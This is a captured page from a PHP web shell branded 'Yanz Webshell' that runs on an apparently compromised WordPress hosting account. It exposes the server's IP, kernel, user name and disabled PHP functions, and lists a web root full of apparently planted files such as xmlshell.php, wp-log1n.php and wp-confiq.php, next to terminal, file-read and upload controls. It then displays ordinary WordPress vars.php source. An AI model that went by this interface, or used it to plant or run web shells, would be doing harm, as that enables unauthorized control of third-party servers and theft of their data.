Attention:
Uname:
Php:
Hdd:
Cwd:		Yanz Webshell! - PRIV8 WEB SHELL ORB YANZ BYPASS!
Linux cp-2.webhost.mn 4.18.0-425.19.2.lve.el8.x86_64 #1 SMP Thu Apr 6 12:07:52 EDT 2023 x86_64
8.1.33 Safe mode: OFF Datetime: 2025-12-14 16:38:15
2792.60 GB Free: 1880.86 GB (67%)
/home/kheruwym/public_html/ dr-xr-xr-x [ root ] [ home ] Text

Server IP:
202.131.4.21
Client IP:
216.73.216.89
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2025-11-28 13:13:32dr-xr-xr-xRename Touch
[ .. ]dir2025-12-11 23:22:37drwx--x--xRename Touch
[ .tmb ]dir2025-11-12 07:07:40drwxrwxrwxRename Touch
[ .well-known ]dir2025-11-12 07:07:35drwxr-xr-xRename Touch
[ 117cb ]dir2025-11-14 05:53:05dr-xr-xr-xRename Touch
[ 1d8b10 ]dir2025-11-14 08:28:52drwxr-xr-xRename Touch
[ cgi-bin ]dir2025-11-14 05:52:56drwxr-xr-xRename Touch
[ f4727b ]dir2025-11-19 07:48:55drwxr-xr-xRename Touch
[ images ]dir2025-11-14 05:52:56drwxr-xr-xRename Touch
[ wp-admin ]dir2025-11-26 03:07:13drwxr-xr-xRename Touch
[ wp-content ]dir2025-11-22 08:16:38drwxr-xr-xRename Touch
[ wp-includes ]dir2025-11-22 08:16:25drwxr-xr-xRename Touch
.htaccess1.13 KB2025-11-28 13:17:43-r-xr-xr-xRename Touch Edit Download
.htaccess.phpupgrader.574027731.31 KB2022-05-09 06:47:34-rw-r--r--Rename Touch Edit Download
.htaccess.phpupgrader.9e97ffcf1.45 KB2023-08-02 18:50:37-rw-r--r--Rename Touch Edit Download
.htaccess.phpupgrader.initial1.31 KB2022-05-09 06:47:34-rw-r--r--Rename Touch Edit Download
click.php1.93 KB2023-09-14 08:16:25-r--r--r--Rename Touch Edit Download
defaults.php1.93 KB2023-07-21 03:50:14-r--r--r--Rename Touch Edit Download
ex.php5.96 KB2025-11-28 13:13:32-rw-r--r--Rename Touch Edit Download
header.php0 B2025-11-10 06:52:51-rw-r--r--Rename Touch Edit Download
index.php35.97 KB2023-05-29 08:16:38-r-xr-xr-xRename Touch Edit Download
index.php035.97 KB2023-09-11 08:16:37-rwxr-xr-xRename Touch Edit Download
item.php1.29 KB2023-08-18 08:15:39-r--r--r--Rename Touch Edit Download
license.txt19.44 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
mah.php1.93 KB2023-12-31 03:48:47-r--r--r--Rename Touch Edit Download
networks.php1.29 KB2024-01-13 03:43:18-r--r--r--Rename Touch Edit Download
options.php1.93 KB2023-12-03 08:16:25-r--r--r--Rename Touch Edit Download
pages.php1.44 KB2023-07-28 08:15:18-r--r--r--Rename Touch Edit Download
php.ini40 B2025-11-18 19:54:41-rw-r--r--Rename Touch Edit Download
plugins.php1.87 KB2023-07-01 08:16:25-r--r--r--Rename Touch Edit Download
product.php2.03 KB2023-04-16 03:50:14-r--r--r--Rename Touch Edit Download
quoys.php26.20 KB2025-11-13 01:08:41-rw-r--r--Rename Touch Edit Download
readme.html7.25 KB2025-09-30 22:02:04-rw-r--r--Rename Touch Edit Download
robots.txt364 B2023-06-15 08:16:38-r--r--r--Rename Touch Edit Download
search.php1.46 KB2023-12-19 08:16:38-r--r--r--Rename Touch Edit Download
track.php6.49 KB2025-11-12 04:05:52-rw-r--r--Rename Touch Edit Download
txets.php5.89 KB2025-11-12 06:13:57-rw-r--r--Rename Touch Edit Download
wp-activate.php7.21 KB2024-04-02 19:31:34-rw-r--r--Rename Touch Edit Download
wp-blog-header.php347 B2025-11-10 06:52:59-rw-r--r--Rename Touch Edit Download
wp-comments-post.php2.27 KB2023-08-09 07:36:19-rw-r--r--Rename Touch Edit Download
wp-config-sample.php3.26 KB2024-11-13 07:16:19-rw-r--r--Rename Touch Edit Download
wp-config.php3.12 KB2022-02-15 07:01:10-rw-------Rename Touch Edit Download
wp-confiq.php0 B2025-11-10 06:52:50-rw-r--r--Rename Touch Edit Download
wp-cron.php5.51 KB2025-11-10 06:53:00-rw-r--r--Rename Touch Edit Download
wp-load.php3.84 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-log1n.php1.72 KB2024-01-28 08:14:59-r--r--r--Rename Touch Edit Download
wp-mail.php8.52 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-settings.php29.38 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-signup.php33.71 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
wp-trackback.php4.98 KB2024-11-13 07:16:19-rw-r--r--Rename Touch Edit Download
xmlrpc.php3.13 KB2025-04-15 21:48:40-rw-r--r--Rename Touch Edit Download
xmlshell.php243.86 KB2025-11-13 16:26:34-rw-r--r--Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Not writable)
Make file: (Not writable)
Terminal:
Upload file: (Not writable)

HEX
HEX
Server: Apache
System: Linux cp-2.webhost.mn 4.18.0-425.19.2.lve.el8.x86_64 #1 SMP Thu Apr 6 12:07:52 EDT 2023 x86_64
User: kheruwym (1551)
PHP: 8.1.33
Disabled: exec,passthru,shell_exec,system
$ pwd: /home/kheruwym/public_html/wp-includes/
Upload Files
File: /home/kheruwym/public_html/wp-includes/vars.php
<?php
/**
 * Creates common globals for the rest of WordPress
 *
 * Sets $pagenow global which is the filename of the current screen.
 * Checks for the browser to set which one is currently being used.
 *
 * Detects which user environment WordPress is being used on.
 * Only attempts to check for Apache, Nginx and IIS -- three web
 * servers with known pretty permalink capability.
 *
 * Note: Though Nginx is detected, WordPress does not currently
 * generate rewrite rules for it. See https://developer.wordpress.org/advanced-administration/server/web-server/nginx/
 *
 * @package WordPress
 */

// Don't load directly.
if ( ! defined( 'ABSPATH' ) ) {
	die( '-1' );
}

global $pagenow,
	$is_lynx, $is_gecko, $is_winIE, $is_macIE, $is_opera, $is_NS4, $is_safari, $is_chrome, $is_iphone, $is_IE, $is_edge,
	$is_apache, $is_IIS, $is_iis7, $is_nginx, $is_caddy;

// On which page are we?
if ( is_admin() ) {
	// wp-admin pages are checked more carefully.
	if ( is_network_admin() ) {
		preg_match( '#/wp-admin/network/?(.*?)$#i', $_SERVER['PHP_SELF'], $self_matches );
	} elseif ( is_user_admin() ) {
		preg_match( '#/wp-admin/user/?(.*?)$#i', $_SERVER['PHP_SELF'], $self_matches );
	} else {
		preg_match( '#/wp-admin/?(.*?)$#i', $_SERVER['PHP_SELF'], $self_matches );
	}

	$pagenow = ! empty( $self_matches[1] ) ? $self_matches[1] : '';
	$pagenow = trim( $pagenow, '/' );
	$pagenow = preg_replace( '#\?.*?$#', '', $pagenow );

	if ( '' === $pagenow || 'index' === $pagenow || 'index.php' === $pagenow ) {
		$pagenow = 'index.php';
	} else {
		preg_match( '#(.*?)(/|$)#', $pagenow, $self_matches );
		$pagenow = strtolower( $self_matches[1] );
		if ( ! str_ends_with( $pagenow, '.php' ) ) {
			$pagenow .= '.php'; // For `Options +Multiviews`: /wp-admin/themes/index.php (themes.php is queried).
		}
	}
} else {
	if ( preg_match( '#([^/]+\.php)([?/].*?)?$#i', $_SERVER['PHP_SELF'], $self_matches ) ) {
		$pagenow = strtolower( $self_matches[1] );
	} else {
		$pagenow = 'index.php';
	}
}
unset( $self_matches );

// Simple browser detection.
$is_lynx   = false;
$is_gecko  = false;
$is_winIE  = false;
$is_macIE  = false;
$is_opera  = false;
$is_NS4    = false;
$is_safari = false;
$is_chrome = false;
$is_iphone = false;
$is_edge   = false;

if ( isset( $_SERVER['HTTP_USER_AGENT'] ) ) {
	if ( str_contains( $_SERVER['HTTP_USER_AGENT'], 'Lynx' ) ) {
		$is_lynx = true;
	} elseif ( str_contains( $_SERVER['HTTP_USER_AGENT'], 'Edg' ) ) {
		$is_edge = true;
	} elseif ( str_contains( $_SERVER['HTTP_USER_AGENT'], 'Opera' ) || str_contains( $_SERVER['HTTP_USER_AGENT'], 'OPR/' ) ) {
		$is_opera = true;
	} elseif ( stripos( $_SERVER['HTTP_USER_AGENT'], 'chrome' ) !== false ) {
		if ( stripos( $_SERVER['HTTP_USER_AGENT'], 'chromeframe' ) !== false ) {
			$is_admin = is_admin();
			/**
			 * Filters whether Google Chrome Frame should be used, if available.
			 *
			 * @since 3.2.0
			 *
			 * @param bool $is_admin Whether to use the Google Chrome Frame. Default is the value of is_admin().
			 */
			$is_chrome = apply_filters( 'use_google_chrome_frame', $is_admin );
			if ( $is_chrome ) {
				header( 'X-UA-Compatible: chrome=1' );
			}
			$is_winIE = ! $is_chrome;
		} else {
			$is_chrome = true;
		}
	} elseif ( stripos( $_SERVER['HTTP_USER_AGENT'], 'safari' ) !== false ) {
		$is_safari = true;
	} elseif ( ( str_contains( $_SERVER['HTTP_USER_AGENT'], 'MSIE' ) || str_contains( $_SERVER['HTTP_USER_AGENT'], 'Trident' ) )
		&& str_contains( $_SERVER['HTTP_USER_AGENT'], 'Win' )
	) {
		$is_winIE = true;
	} elseif ( str_contains( $_SERVER['HTTP_USER_AGENT'], 'MSIE' ) && str_contains( $_SERVER['HTTP_USER_AGENT'], 'Mac' ) ) {
		$is_macIE = true;
	} elseif ( str_contains( $_SERVER['HTTP_USER_AGENT'], 'Gecko' ) ) {
		$is_gecko = true;
	} elseif ( str_contains( $_SERVER['HTTP_USER_AGENT'], 'Nav' ) && str_contains( $_SERVER['HTTP_USER_AGENT'], 'Mozilla/4.' ) ) {
		$is_NS4 = true;
	}
}

if ( $is_safari && stripos( $_SERVER['HTTP_USER_AGENT'], 'mobile' ) !== false ) {
	$is_iphone = true;
}

$is_IE = ( $is_macIE || $is_winIE );

// Server detection.

/**
 * Whether the server software is Apache or something else.
 *
 * @global bool $is_apache
 */
$is_apache = ( str_contains( $_SERVER['SERVER_SOFTWARE'], 'Apache' ) || str_contains( $_SERVER['SERVER_SOFTWARE'], 'LiteSpeed' ) );

/**
 * Whether the server software is Nginx or something else.
 *
 * @global bool $is_nginx
 */
$is_nginx = ( str_contains( $_SERVER['SERVER_SOFTWARE'], 'nginx' ) );

/**
 * Whether the server software is Caddy / FrankenPHP or something else.
 *
 * @global bool $is_caddy
 */
$is_caddy = ( str_contains( $_SERVER['SERVER_SOFTWARE'], 'Caddy' ) || str_contains( $_SERVER['SERVER_SOFTWARE'], 'FrankenPHP' ) );

/**
 * Whether the server software is IIS or something else.
 *
 * @global bool $is_IIS
 */
$is_IIS = ! $is_apache && ( str_contains( $_SERVER['SERVER_SOFTWARE'], 'Microsoft-IIS' ) || str_contains( $_SERVER['SERVER_SOFTWARE'], 'ExpressionDevServer' ) );

/**
 * Whether the server software is IIS 7.X or greater.
 *
 * @global bool $is_iis7
 */
$is_iis7 = $is_IIS && (int) substr( $_SERVER['SERVER_SOFTWARE'], strpos( $_SERVER['SERVER_SOFTWARE'], 'Microsoft-IIS/' ) + 14 ) >= 7;

/**
 * Test if the current browser runs on a mobile device (smart phone, tablet, etc.).
 *
 * @since 3.4.0
 * @since 6.4.0 Added checking for the Sec-CH-UA-Mobile request header.
 *
 * @return bool
 */
function wp_is_mobile() {
	if ( isset( $_SERVER['HTTP_SEC_CH_UA_MOBILE'] ) ) {
		// This is the `Sec-CH-UA-Mobile` user agent client hint HTTP request header.
		// See <https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Sec-CH-UA-Mobile>.
		$is_mobile = ( '?1' === $_SERVER['HTTP_SEC_CH_UA_MOBILE'] );
	} elseif ( empty( $_SERVER['HTTP_USER_AGENT'] ) ) {
		$is_mobile = false;
	} elseif ( str_contains( $_SERVER['HTTP_USER_AGENT'], 'Mobile' ) // Many mobile devices (all iPhone, iPad, etc.)
		|| str_contains( $_SERVER['HTTP_USER_AGENT'], 'Android' )
		|| str_contains( $_SERVER['HTTP_USER_AGENT'], 'Silk/' )
		|| str_contains( $_SERVER['HTTP_USER_AGENT'], 'Kindle' )
		|| str_contains( $_SERVER['HTTP_USER_AGENT'], 'BlackBerry' )
		|| str_contains( $_SERVER['HTTP_USER_AGENT'], 'Opera Mini' )
		|| str_contains( $_SERVER['HTTP_USER_AGENT'], 'Opera Mobi' ) ) {
			$is_mobile = true;
	} else {
		$is_mobile = false;
	}

	/**
	 * Filters whether the request should be treated as coming from a mobile device or not.
	 *
	 * @since 4.9.0
	 *
	 * @param bool $is_mobile Whether the request is from a mobile device or not.
	 */
	return apply_filters( 'wp_is_mobile', $is_mobile );
}
@ Telegram